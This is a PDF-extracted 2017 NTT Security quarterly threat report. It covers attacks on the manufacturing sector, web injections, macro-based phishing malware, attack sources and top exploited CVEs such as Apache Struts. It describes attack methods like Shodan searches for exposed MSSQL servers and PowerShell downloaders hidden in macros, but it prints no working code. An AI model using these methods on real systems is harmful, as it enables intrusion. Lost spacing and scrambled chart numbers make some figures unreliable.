Global Threat Intelligence Center (GTIC) 2017 … Security Q2 2017... · Global Threat Intelligence...

Global Threat Intelligence Center (GTIC) Quarterly Threat Intelligence Report

Q22 0 1 7

Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2Quarterly Highlights . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Global Threat Visibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 AttackProfileoftheManufacturingIndustry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Apache“Struts”itsStuff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3Global Threat Visibility / Observations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 TargetedIndustries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 ACloserLookatAttacksAgainstManufacturingIndustry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Attacks by Type . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Web Application Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 AnalysisofMalwareDetections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 Attacks by Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 France . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 Netherlands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 TopTargetedVulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 AdobeFlashExploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 ApacheStruts,ShellShockandWannaCry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Global Threat Visibility: Final Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14Attack Profile of the Manufacturing Industry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 WhatMakesManufacturinganAttractiveTarget? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Trends–andAssociatedEmergingRisks–intheManufacturingIndustry . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 OperationalTechnologyand“SmartFactories” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Industry4.0:Automation,ConnectivityandServitization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 NewTechnologiesandReuseofOldSoftware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 CyberEspionageandTheftofIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 ThreatstoManufacturing:FinalThoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19Apache CVE-2017-5638 Struts its Stuff: A Quick Look into Apache Struts . . . . . . . . . . . . . . . . . . . . . . . 20 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 WhatisaStrutsAttack? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 StrutsAttacksTimelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 ObservedAttacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Struts Targets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 WhyTargetStruts? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 ApacheStrutsMitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 StrutsSignaturesandRules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 ApacheStruts:Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25About GTIC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25About NTT-CERT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25About NTT Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

Table of Contents

NTTSecurityanditsGlobalThreatIntelligenceCenter(GTIC)focus

onprovidingtimelyandactionableinformation,allowingour

clientstogainabetterunderstandingofthethreatsfacingtheir

organizationstoday.Thisisaccomplishedthroughresearchand

analysisofbothcurrentandemergingsecuritythreats.Collaboration

withtheSecurityOperationsCenters(SOCs),InformationSecurity

EngineeringTeam(ISET),ProfessionalSecurityServices(PSS)and

ManagedDeviceTeam(MDT)allowsNTTSecurityclientstobenefit

fromourproactiveapproachtosecurityresearchandthecontinuous

evolutionofdetectioncapabilities.

TheGTICQuarterlyThreatIntelligenceReportprovidesaglimpseinsidetheresearchconductedbyNTTSecurityresearchers,security

professionalsandanalysts,spanningthelastthreemonths.Inadditiontoawidevarietyofopen-sourceintelligencetoolsand

honeypots,GTIC–ThreatResearch(TR)alsoanalyzesdatafromglobalNTTSecuritymanagedsecurityservice(MSS)platforms.These

patented,cloud-basedNTTSecurityserviceplatformscollect,correlateandanalyzesecurityeventsacrosssystemsforourclientsaround

theworld,providingresearcherswithanevendeeperunderstandingoftheoverallthreatlandscape.

The quarterly report focuses on several different areas of research and analysis:

• Findingsfromouranalysisofactualeventsasobservedwithinclientenvironmentsandourhoneynetinfrastructure

• Findingsrelatedtoresearchfromspecificthreats

• Observationsfromrecentpublicly-disclosedbreachesandrecommendationsonhowtomitigateandpreventsimilarattacks

• AnalysisofmaliciousactorTactics,TechniquesandProcedures(TTPs)

InpreviouseditionsoftheGTICQuarterlyThreatReport,NTTSecurityanalystshavefocusedontheretail,financialandhealthcare

industries,providingaglimpseintocyberthreatsuniquetoeachindustry.Thisissuefocusesonseveralthreatsthemanufacturing

industryisfacing.And,althoughthemanufacturingindustrycoversanincrediblybroadlistofsegments,thisreportaddressesseveral

commondenominatorsacrosstheboard.

Whilenottypicallythoughtofashighly'attackable,'manufacturinghasbeenoneofthemostconsistentlyattackedindustriesoverthe

pastseveralyears.And,inadditiontopotentialthreatsuniquetomanufacturers,theindustryalsofacesavarietyofthreats,prevalent

acrossmanyindustries,includinginsiderandtechnicalthreats.Thisquarterlyreporttakesacloserlookatsomeoftheseproblems.

Introduction

Copyright 2017 NTT Security 3

• 86percentofmalwareinthemanufacturingindustrywere variantsofTrojansanddroppers.

• Reconnaissanceaccountedfor33percentofallactivityaimed atmanufacturingclientsinQ2‘17.

Apache “Struts” its Stuff• NTTSecuritydetectedattacksforApacheStruts,CVE-2017- 5638,lessthan48hoursaftertheinitialApacheadvisory, andlessthan24hoursafterthereleaseofproof-of-concept (PoC)code.

• ApacheStrutsbecamea“topfive”attacktypewithinabouta weekofbeinginitiallydetected,andattheendofJune,was stilla“topseven”attack.

• 76percentofallattackstargetingApacheStrutsoriginated fromIPaddressesinChina.

• 69percentofStrutsattacksfromChinaattemptedtodisable localfirewallsandinstallmalwarefromremoteservers, mostlylocatedintheUnitedStates,ChinaandSouthKorea.

• IntheU.S.,themosttargetedindustriesofattacksagainst ApacheStrutswereeducation(37percent)andhealthcare (28percent);inJapan,themosttargetedindustrywas government(46percent).

Duringthesecondquarterof2017(Q2‘17),NTTSecurityresearchersandanalystsuncoveredinformationthroughtheresearchofsignificantevents,identifiedviaglobalvisibilityoftheNTTSecurityclientbase.Someofthekeyfindingsbasedonthisresearchinclude:

Global Threat Visibility

• Overall,NTTSecurityobserveda24percentincrease inattacksagainstourclientsduringQ2’17overthe previousquarter.

• BasedonNTTSecurityclientdata,cybercriminalsappear tobeleveragingphishingemailswithmaliciousattachments containingPowerShellcommandsinVBAmacrosasaprimary attackvector.

• 67percentofallmalwaredistributioninQ2‘17was email-based.

• Public-facingMicrosoftSQL(MSSQL)serverswerepopular targetsforbrute-forcingbycybercriminalsduringQ2‘17.

• Webapplicationattacksaccountedfor21percentofall attacks.60percentofthosewereSQLandPHP injection-based.

• Vulnerabilitiesallowingcodeexecutionaccountedfor 73percentofattacks.

• ActivityagainstAdobeFlashPlayervulnerabilitiesaccounted for98percentofallactivitytargetingAdobeproducts.

• FiveoutoftheTop10mosthostilecountrieswerenewtothe Top10sincethefourthquarter2016(Q4’16).

Attack Profile of the Manufacturing Industry• Themanufacturingindustrywasthemostheavilytargeted industryacrossNTTSecurityclientsduringQ2’17,accounting for34percentofattackactivity.

• Themanufacturingindustrywasalsoheavilytargetedacross NTTSecurityclientnetworksthroughout2016,appearingin the“topthree”infiveofthesixgeographicregions.Noother industryappearedinthetopthreemorethantwice.

• 58percentofmalwaredistributioninmanufacturing environmentswasviaweb-baseddownloads.

QuarterlyHighlights


Top Targeted Industries

Manufacturing Finance Health Care Business Services Technology

Retail Other

0% 5% 10% 15% 20% 25% 30% 35%

25%

13%

10%6%

5%7%

40%

34%34%

GlobalThreatVisibility/Observations

IntroductionNTTSecurityanalystsobserveda24percentincreaseinthenumberofsecurityeventsduringQ2’17fromthepreviousquarter.AnalysisofMSSPdatasuggeststhisistheresultofanincreaseinreconnaissanceandphishingdistributionefforts,asthreatactorsheavilyfocusedonfindingvulnerablepublicfacingservers.Additionally,thetacticofembeddingmaliciousVBAmacrosintodocumentssentviaphishingemailsregainedpopularityduringQ2‘17,asevidencedbyanincreasein phishingcampaigns.

Targeted IndustriesAnalysisshowsthetopfiveindustriestargetedweremanufacturing,finance,healthcare,businessservicesandtechnology.Manufacturingwasthemostheavilytargetedindustry,with34percentofattacks. A Closer Look at Attacks Against Manufacturing IndustrySinceclientsinthemanufacturingindustryweretargetedin34percentofallmaliciouscyberactivity,NTTSecurityanalystsfocusedonthethreatsinthisindustry.

Manufacturing Attack Timeline

1,762K

1,868K490K

Manufacturing Attack Categories

Reconnaissance Brute Force Malware

0 500K 1,000K 1,500K 2,000K

Mar 26 Apr 2 Apr 9 Apr 16 Apr 23 Apr 30

Week of Date (2017)

May 7 May 14 May 21 May 28 Jun 4 Jun 11

Reconnaissance

Brute Forcing

Malware

Reconnaissance

Brute Forcing

Malware

Figure 2. Attack category timeline against manufacturing.

Figure 1. Q2 ’17 top targeted industries based on attack volume.



Thetopthreeattackcategoriesinthemanufacturingindustrywere:reconnaissance(33percent),brute-forceattacks(22percent)andmalware(ninepercent).Figure 2showsloweractivityagainstmanufacturingthroughoutApril,beforeseveralspikesoccurinMayandJune.Whiletherewasageneralincreaseinactivityagainstmanufacturingorganizationsthroughoutthequarter,themostsignificantincreaseinmaliciousactivitywasrelatedtothesethreecategories.

Reconnaissance Against ManufacturingReconnaissanceaccountedfor33percentofallactivityaimedatmanufacturingclientsinQ2‘17.AnalysissuggestscybercriminalsusedseveraldifferentpopularscanningtoolssuchasZmEu,MetasploitandMuieblackcattoscanpublic-facingsystems.Thesetoolscomeequippedwithseveralplugins,allowingforevenbeginnercybercriminalstoscanandfindvulnerabilitiesinsystemsandapplications.NTTSecurityidentifiedtheintendedpurposeofrecordedreconnaissancetrafficasshowninFigure 3.

Result ofExploitation

RemoteCode

Execution

RemoteCode

Execution

CVE

CVE-2012-1823

CVE-2012-2311

Product

sapi/cgi/cgi_main.cin PHP

sapi/cgi/cgi_main.c

Version(s)

< 5.4.2

< 5.4.3

RemoteCode

ExecutionCVE-2015-2208 phpMyAdmin 1.1.2

7.5

7.5

7.5

CVSS

Table 1. Top three targeted PHP vulnerabilities via reconnaissance and exploitation efforts against the manufacturing industry.

Asshown,PHP-basedapplicationsaccountedfor75percentofallreconnaissanceeffortsagainstthemanufacturingindustry.AmajorityofthistrafficwasviatheuseofZmEuandMuieblackcatscanningtools,whichscanforvulnerabilitiesincommonPHPfilesandpluginsbehindwebapplicationsandcontentmanagementsystems(CMS)likeWordPress.In2016WordFence1 conductedasurveywhichindicatedroughly56percentofallhackedWordPresssiteswerecompromisedviaexploitedplugins.ThephpMyAdminpluginwasdevelopedtosimplifydatabaseadministration,isthefront-endtoMySQLdatabases,andapopulartargettogainfullaccessoveradatabase.Althoughthesescansarecommon,theycanbeeffectiveifwebapplications,websites,etc.arenotconfiguredfollowingbestsecuritypractices.Thisbecomesalargerissueifthewebsiteorwebserverbeingusedinamanufacturingorganizationsetsupthewebserverina“securityunaware”manner,ordoesnotapplyautomaticupdatespotentiallyleavingthecompanyororganizationblindtoitsvulnerabilities.

ThefollowingvulnerabilitiesassociatedwithPHPapplicationsweretargetedinbothreconnaissanceandexploitationeffortsagainstthemanufacturingindustry.

75 .0% PHP Applications14 .0% DNS Servers7 .00% SNMP or ICMP Protocols2 .00% Web Servers1 .25% All Others0 .70% WordPress0 .05% NetBIOS Ports

Manufacturing Reconnaissance Targets

Figure 3. Targeted applications of reconnaissance traffic based on volume.

1 https://www.wordfence.com/blog/2016/03/attackers-gain-access-wordpress-sites/


MSSQL

FTP

HTTP

LDAP

SSH

Magento

MySQL

April 1 - April 8 April 9 - April 16 April 17 - April 24 April 25 - May 01 May 02 - May 09 May 10 - May 17 May 18 - May 25 May 26 - June 02 June 03 - June 11

Manufacturing Brute-Force Targets

Week of Date (2017)


Brute-forcing Manufacturing Systems and ApplicationsBrute-forcingtrafficaccountedfor22percentofallattacksagainstthemanufacturingindustry.NTTSecurityfocusedontheserver/applicationtargetsofthistraffic,discoveringFTPserverswereofhighestinterestat64percent,followedbyHTTP(18percent)andSSH(11percent).Figure4showsmanufacturingbrute-forcetargetvolumesforQ2‘17. Per Figure 4,althoughFTPandHTTPhadseverallargespikesforbrute-forceattempts,MSSQLwasconsistentlytargetedwithseveralthousandeventseachdayinApril,MayandJuneacrossmultipleclients.MSSQLisarelationaldatabasemanagementsystem(RDBMS)whichisapopulartargetinmanufacturingintermsofbrute-forcing.NTTSecuritydiscoveredthousandsofpublic-facingMSSQLserverswithdefaultport1433open. Figure 5showsasimpleShodanqueryforpublic-facingMSSQLservers.Thesequeriesrevealimportantdetailstoanattackersuchasservername,instancename,version,andportused.Combinethisreadilyavailableinformationwithagenericbrute-forcingtool,andthereturnoninvestmentforacybercriminalcouldbeexponential.InJanuary2017,thousandsofpublic-facingMongoDBdatabaseswerecompromised2andheldforransombycybercriminals.Notlongafter,CouchDBandHadoopServers

Figure 4. Manufacturing brute force target attack volume.

2 https://nakedsecurity.sophos.com/2017/01/11/thousands-of-mongodb-databases-compromised-and-held-to-ransom/3 https://www.bleepingcomputer.com/news/security/database-ransom-attacks-hit-couchdb-and-hadoop-servers/

werecompromised3usingthesameattackprocess.Forthisreason,itisnotonlybest-practice,butessentialthatdatabases/serversnotbepublic-facingandnothavedefaultcredentialsand/orportstodefendagainstbrute-forceattacks.

Figure 5. Simple query using Shodan’s API for public facing MSSQL servers.


Manufacturing Malware Distribution

0

500

1000

1500

2000

2500

3000

3500

April 7 April 17 April 27 May 7 May 17 May 27 June 6

Other Manual File TransferWeb


Malware in the Manufacturing EnvironmentNTTSecuritydiscovered86percentofmalwareinthemanufacturingindustrywereTrojan/droppervariants;inotherwords,softwareorapplicationswhichdropadditionalmaliciousbinarieswhethertheyappeartobelegitimateornot.NTTSecurityanalyzedthedistributioneffortsfordeliveringmalwaretosystemsinthemanufacturingindustry.Themostcommontechniqueusedtodistributemalwarewasdrivebydownloads.Figure 6showsmalwaredistributioneffortsthroughoutQ2’17inthemanufacturingindustry.Inadditiontothedatashowninthechart,NTTSecuritydetectedasmallvolumeofattemptedmalwaredistributionviaemailagainstthemanufacturingindustry.Sincethistypicallyamountedtolessthanafewattemptsperday,itdoesnotdisplaywellinFigure6.

Fifty-eightpercentofmalwaredistributioninmanufacturingenvironmentswasviaweb-baseddownloads.Web-baseddownloadsresultinginmalwareinstallationsviathewebcouldoccurwhenoneofthefollowingconditionsexist:

• Visitingacompromisedwebsitewhichdirectlyprovidesthe maliciouscontent,or

• Visitingacompromisedwebsitewhichhasmaliciouscontent providedtoit,forexample,viamalvertising.

NTTSecurityMSSPdataindicatesthatcybercriminalsoftenrelyonwebresourcestodelivermalwaretothemanufacturingindustry.

Figure 6. Malware distribution efforts in the manufacturing industry in Q2 ‘2017.



Attacks by TypeNTTSecurityanalysisindicates21percentofallattacksacrossallindustrieswerewebapplicationfocused,followedbyapplicationspecific(16percent)andmalware(12percent)basedattacks.Figure 7depictsasimplebargraphfortherepresentationofthesefindings.

Web Application AttacksAsstated,21percentofallattackswereagainstwebapplications.Sixtypercentoftheseattackswereinjection-based.Thisincludes,butisnotlimitedto,SQLandPHP-basedapplicationsaswellasincludingarbitrarycommandsinHTTPpacketstobeexecutedonthetargetserver.

A Closer Look at Web InjectionsWhileitiscommontoobserveanddetectSQLiagainstpublicfacingdevices,NTTSecurityidentifiedseveraltypesofwebinjectionsinQ2’17;thisincludes,butisnotlimitedto,PHP-basedapplications,LDAP,andHTTP.

PHP-based InjectionsWiththousandsoflibraries,PHPisoneofthemostcommonlyusedserver-sideprogramminglanguages.AccordingtoW3Techs4,PHPisdeployedonabout83percentofwebservers.Asdeveloperscontinuetointroducevulnerabilitiesintoapplications,threatactorswillcontinuetotargetPHP-basedapplications.BasedonNTTSecurityobservations,commandinjectionattemptsagainstPHP-basedapplicationsgainedpopularityasaspecifictypeofwebapplicationattackinQ2’17.

Figure 8. SQL-based injections versus PHP-based injections.

97 .0% SQL 3 .00% PHP <0 .01% Other

Web Application Injection Targets

Theprimarygoaloftheseattacksisarbitrarycodeexecution,theexecutionofmachinecodeonatargetmachineortargetprocesstypicallyleveragedafterexploitingavulnerability.Theexecutionofarbitrarycodeallowsthecybercriminaltotellthemachineorprocesswhattodo.Figure 8showswebapplicationinjectiontargetsaccordingtoMSSPdata.NTTSecuritydiscoveredamajorityoftheSQL-basedinjectionsweregenericandlikelybeinggeneratedviacommontoolssuchasHavijorsqlmap,whichtendtobenoisy.Meanwhile,PHP-basedinjectionsareusuallymorefocused,andbasedontheapplicationorvulnerabilitybeingtargeted.

21%16%

12%12%

10%7%

6%5%

4%4%

<3%

Attack Category Volume

Web Application AttackApplication Specific Attack

MalwareReconnaissance

DoS/DDoSSuspicious

Brute ForcingKnown Bad Source

Client Botnet ActivityService Specific Attack

Other

0 5 10 15 20 25

Figure 7. Attack category volume.

4 https://w3techs.com/technologies/details/pl-php/all/all


Figure 9. Attack volume differences in malware variants between Q4 ’16 and Q2 ’17.

0

20000

40000

60000

80000

100000

Q4’16 and Q2’17 Malware Variant Comparison

Q4’16 Q2’17 Q4’16 Q2’17 Q4’16 Q2’17Q4’16 Q2’17Q4’16 Q2’17Q4’16 Q2’17Q4’16 Q2’17

SpywareKey Logger

Root KitBotnetClient

RansomwareFakeware

Dialers

AdwareMalicious BHO

VirusWorm

TrojanDropper

Down48%

Down25%

Down98%

Down22%

Up1275%

Up234%

Up4354%

Q4’16 and Q2’17 Malware Variant Comparison

Email

67%

Other

22%

Web

10%

ManualUpload

1%

Analysis of Malware DetectionsNTTSecurityanalystsanalyzedthedifferencesinmalwarevariantsbetweenQ4’16andQ2’17.

Overall,malwaredetectionsdropped41percentbetweenQ4’16andQ2’17.AsshowninFigure 9,Virus/Worms,Adware,andRansomwareallincreasedinQ2’17whilethevolumeofothermalwarevariantdetectionsfell.

NTTSecurityobservedthatmalwarecampaignscommonlycombinephishingemailswithamaliciousattachmentcontainingembeddedVBAmacros.ThesemacrosoftencontainobfuscatedPowerShellcommands,usedtodownloadthefinalmalwarepayload.WhileanalyzingMSSPdata,NTTSecurityobserved67percentofallattemptedmalwaredistributionwasthroughemail.Pleasenotethesestatisticsdonotincludesuccessfulversusunsuccessfulmalwareinstallations.Figure 10detailsthesefindings.


Figure 10. Malware distribution across all industries.



Forexample,whileanalyzingthemalwarecategory,MD5hashe5f6bf18b4b8024c0fd3e17595e8fb365wasdiscoveredinseverallogsforNTTSecurityclients.ThiswasthehashofamaliciousExcelfilesentinaphishingemailwiththefilename“FW20-05-17Dokument-VATI.xls.”Atinitialglance,thedocumentseemedharmless,however,asshowninFigure 11,analysisofoneofthetwoembeddedVBAmacrosdetailedobfuscatedcode. SeveralstringsineachvariablevaluewerebackwardsorrepresentedbyASCIInumbers.Variablesepitiimsorandmarvells werebothobfuscatedinthesamemanner,butoncedecoded

andcombined,theyrevealedaPowerShellcommandusedtodeliverWindowsmalware.

NTTSecurityexpectsthecontinueduseofphishingattackswithdocumentscontainingembeddedVBAmacroswilloccurwhereattackersuseamixofWindowstoolssuchasPowerShell,WindowsManagementInstrumentationCommand-Line(WMIC),orPsExectodownloadthemalwarepayload.Thistechniqueiseffectiveanddistributioncanbeautomatedtoincreasethelikelihoodofsuccessfullycompromisingvictims.

Figure 11. _VBA_PROJECT_CUR/VBA/ThisWorkbook Source Code.

Figure 12. Deobfuscated PowerShell command to retrieve mps.exe (365c4b6e651034daaebd4363efa4b0f)6.

5 https://www.virustotal.com/en/file/e3fff8975c852e6a7e4909033a2dec9c1c7ae794be2dd0e45398a6541293101b/analysis/6 https://www.virustotal.com/en/file/96c8aea7d0f65dfc41ccaf5384abfe19d5ea0f1f1e9c6359ae985932ac4db1e8/analysis/



93% Reconnaissance 3% Known Bad Source <1% Brute Forcing <1% DoS/DDoS <1% Web Application Attack <1% Application Specific Attack <1% Malware <1% Suspicious <1% Client Botnet Activity <1% Service Specific Attack

France Attack Categories

>20% 9 Puerto Rico 1%p

>20% 8 Chile 1%p

>20% 10 Hungary 1%p

>20% 7 Germany 3%p

Change

5p

p

t u

1 France 47%

8 2 Netherlands 8%

>20% 4 Brazil 4%

8 8 Canada 4%

3 3 China 6%

1 5 United Kingdom 4%

Rank Q2 2017 Attack Source % of AttackRank Q4 2016

p

q

t u

Figure 13. Top ten attacks originating from hosts in France.

Table 2. Top non-U.S. attack countries.

Attacks by SourceNTTSecurityanalystsreviewedthetopcountrieshostingsystemswhichgeneratedmalicioustrafficbetweenQ4‘16andQ2‘17.

DuringQ2’17,twocountriesstoodoutduetothepatternoruniquenessofactivity.Overthepastfewyears,theinfrastructureslocatedinFranceandtheNetherlandshaveimprovedsignificantly.Eachoffersawiderangeofservicestosupportindividualandspecificneeds,includingtelephony,hosting,cable,andinsomecases,alltheabove.Thehostingandvirtualprivateserver(VPS)markethascreatedasurgeinaffordableoffshorehosting.Threatactorsarestartingtomigrateandorexploitvulnerableserversinthesetwocountriesmoreandmore.Regardlessoftheactor’spurposeorreasoning,theywillcontinuetouseandexploitvulnerableservices.

FranceFranceaccountsfor47percentofhostileattacktraffic,mostofwhichappearstobeprobingorscanning-relatedactivities.However,monitoringdataincludesmultipleexamplesofexploitandunauthorizedaccessattempts.ThelargestclusterofexploiteventsisassociatedwithOnlineS.A.S.,amajortelecommunicationsentityprovidinginternetaccesstoFrance,NetherlandsandpossiblyotherEUcountries,asthisprovidercontinuestoexpanditsreach.SomeoftheserversappeartoberunningNginxandorotherproxyconfigurations.Becauseofthis,itislikelythetrueattackersareoperatingfromotherlocations.Thistypeofactivitywilllikelyincrease,asfewprovisionsarehistoricallytakenbytheusersandTier1providerstoremedythesituationbysecuringusersandenforcingpolicies.Overall,Figure 13displaysthetoptenattacksoriginatingfromFrance.Reconnaissanceactivityisthemostcommon,at93percentofalldetectedactivity.


70%22%

6%<1%<1%<1%<1%<1%<1%<1%<1%

Attack Categories from Hosts in Netherlands

ReconnaissanceWeb Application Attack

Application Specific AttackMalware

Known Bad SourceBrute Forcing

Brute ForceDoS / DDoSSuspicious

Service Specific AttackClient Botnet Activity

0 40302010 50 60 70 80


NetherlandsTheNetherlandscameinadistantsecond.UnlikeFrance,whosetrafficoriginatedfrommultipleISP/providers,sourcesinTheNetherlandsoriginatedfromonlythreeIPaddressesallocatedtoKPNB.V.,aDutch-basedtelecommunicationscompanyprovidinginternetandmobilephoneaccess.Basedontheeventdata,athree-dayinitiativefromtwooftheseIPaddressestargetedasinglevictiminthemanufacturingindustry.Activityfrom145.129.22[.]220accountedfor75percentoftheactivity;25percentwasfrom145.129.21[.]42.ActivityfromthethirdIPaddresswasultimatelyinsignificant.TheirprimarygoalwashostandnetworkdiscoveryviaDNSzonetransfers.Zonetransferscandisclosealargeamountofinformationaboutanetworkandorganization,dependingontheresourcerecords(RR)beingusedandhostnomenclature.

Overall,Figure 14 displaysthetoptenattacksoriginating fromNetherlands,showingthatreconnaissancewasthe mostcommonlydetectedattacktypewith70percentofallhostileactivity.

Top Targeted VulnerabilitiesDuringQ2‘17,codeexecution-basedvulnerabilitiesaccountedfor73percentofthetopattacks.ThetopthreeCVEslistedinTable 3weremostpopular.

Thesevulnerabilitieswereobservedbeingexploitedfromsourcesin68countries.ThemostprolificattemptsoriginatedfromChina,PolandandFrance.Thistrendspannedacross15industrieswithmanufacturingandfinanceasthetoptwoaffected,andtechnologyasadistantthirdplace.Inachange

Figure 14. Top Ten Attacks Originating from Hosts in Netherlands.

CVE

CVE-2016-4116

CVE-2017-5638

CVE-2014-6271

EventPercentage

57%

24%

10%

Target/Campaign

Adobe Flash

Apache Struts

CVE-2017-0147 3% WannaCry(EternalBlue)

CVE-2011-3230 3% Safari Exploit

ShellShock

CVE-2009-0183 3%Free

Download Manager

Table 3. Code execution target-campaign event percentage.

frompreviousanalysis,thetelecommunicationindustrywastargetedrelativelylightlyduringQ2’17.Theexceptiontothiswasasmallsubsetwithintelecommunications,specificallybusinessesthatprovidehostingorotherconnectivityservices,whichwerehighlytargetedbyattemptstoexploitvulnerabilitiesinApacheStrutsandBash(Shellshock).


29% Manufacturing26% Finance8% Technology8% Health Care7% Non-Profit7% Construction/Real Estate6% Retail9% Other

Industries Targeted with Top 10 CVEs


Figure 15. Attack method visualization according to CVE.

Table 4. Top five Adobe Flash Player vulnerabilities being targeted.

DataTheft

CodeExecution

73% 20% 7%

Denialof Service

(DoS)

TheidentifiedCVEsinthetop-tencanbecategorizedintothreeattackmethodologies:

• codeexecution

• datatheft

• denialofservice(DoS)

Adobe Flash ExploitsSignaturesforCVE-2016-4116triggeredonspecificporttrafficusedtolaterallymovefiles.Flashhasbeen,andwillfortheforeseeablefuture,continuetobeahighly-targetedproductduetoitswidespreaduseacrossmultipleoperatingsystems,anditshistoryofvulnerabilities.IncomparisontootherAdobeproducts,Flashaccountedforastaggering98percentofallAdobe-basedvulnerabilityevents.Ofthattotal,themosttargetedvulnerabilitywasCVE-2016-4116.

Apache Struts, ShellShock and WannaCryThereisareasonwhyattackersfromeachofthetopcountriesconsistentlytargetthesevulnerabilities.EachcanbeusedtogainaccessorremotelycontrolWindowsandLinux-basedsystems.TheexceptionisWannaCrywhichutilizedtheEternalBlueexploit,andspecificallytargetsWindowssystems.Thesuccessofexploitingthesevulnerabilitiesisdependentonthepremisethatmanyvendorsandadministratorshavenotpatched,updatedsystemsortakenadditionalprecautions.Untilindustryimprovestheconsistencyandregularitywithwhichtheyupdatesystems,suchattackswillcontinue.NTTSecurityanalystsobservedtheCVEsassociatedwiththesenowinfamousnamestrendingacrossfifteenindustries.Theheaviestconcentrationofthisactivitywasinthemanufacturingandfinanceindustries.

Financialinstitutionscanlosemillionsofdollarsasaresultofmoneystolenfromaccounts,ormoneypaidforransomware.Manufacturingcanlosejustasmuchfromtheftofproductideas,andintellectualpropertysoldtocompetitors.Alltheindustriesonthelisthavevaluableinformationtoprotect.

Adobe Product EventPercentage CVE Total

